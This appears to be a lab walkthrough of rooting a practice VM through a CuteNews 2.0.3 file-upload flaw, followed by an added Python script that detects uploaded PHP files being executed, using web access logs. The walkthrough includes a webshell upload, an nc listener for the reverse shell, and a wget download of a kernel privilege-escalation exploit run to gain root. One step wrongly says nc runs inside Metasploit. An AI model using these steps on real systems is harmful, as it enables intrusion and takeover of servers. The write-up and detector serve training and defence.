- Browse to http://10.0.2.154/ and find that the site runs CuteNews v.2.0.3, a news publishing system with a known vulnerability:
root@kali:~# searchsploit cutenews 2.0.3
--------------------------------------------------------------------------------------------
Exploit Title | Path (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------------------
CuteNews 2.0.3 - Arbitrary File Upload | ./php/webapps/37474.txt
- Upload
shell.php
- Brute-force directories to find the upload directory:
dirb http://10.0.2.154
which yields http://10.0.2.154/uploads/
- Open Metasploit and run:
nc -vnlp 1234
- Execute the uploaded shell:
curl http://10.0.2.154/uploads/avatar_testusername_shell.php
- Once connected, spawn a TTY:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
www-data@simple:/var/www/html/uploads$
- This Ubuntu release has a known privilege-escalation vulnerability:
www-data@simple:/var/www/html/uploads$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
- Download the exploit:
www-data@simple:/tmp$ wget https://www.exploit-db.com/download/37292
- Compile and run it, which finally yields a root shell:
# gcc 37292.c -o exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
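
On the defensive side, the request for a script file under /uploads/ seen in the walkthrough is visible in the web server's access log. The following is an added example, not part of the original write-up: it flags such requests, assuming Apache combined log format, and the log lines in it are constructed samples.

```python
import posixpath
import re
from urllib.parse import unquote

# Prefix of an Apache "common"/"combined" access-log line (assumed format).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Extensions a PHP-enabled server may hand to the interpreter, including
# double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|/|$)", re.I)
UPLOAD_DIR = "/uploads/"  # the directory found in the walkthrough


def normalise(target):
    """Drop the query string, decode %xx and collapse '//' and '..'."""
    path = unquote(target.partition("?")[0])
    return posixpath.normpath(re.sub(r"/+", "/", "/" + path))


def flag_upload_execution(lines):
    """Return one finding per request for a script file under UPLOAD_DIR."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        path = normalise(m["target"])
        if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            findings.append({
                "ip": m["ip"],
                "path": path,
                # 200 means the server answered from that file
                "executed": m["status"] == "200",
            })
    return findings


# Constructed sample log lines (not taken from the target VM).
SAMPLE = [
    '10.0.2.15 - - [01/Jan/2016:10:00:00 +0000] "GET /uploads/avatar_alice_me.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.2.15 - - [01/Jan/2016:10:01:00 +0000] "GET /uploads/avatar_testusername_shell.php HTTP/1.1" 200 0 "-" "curl/7.47.0"',
    '10.0.2.15 - - [01/Jan/2016:10:02:00 +0000] "GET /index.php?x=/uploads/a.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.2.15 - - [01/Jan/2016:10:03:00 +0000] "GET /docs/..%2fuploads//avatar_bob_x.PHP5 HTTP/1.1" 404 210 "-" "curl/7.47.0"',
]

if __name__ == "__main__":
    for finding in flag_upload_execution(SAMPLE):
        print(finding)
```

Any finding with "executed" set to True means the upload directory is serving interpreted files; that directory should only ever return static content.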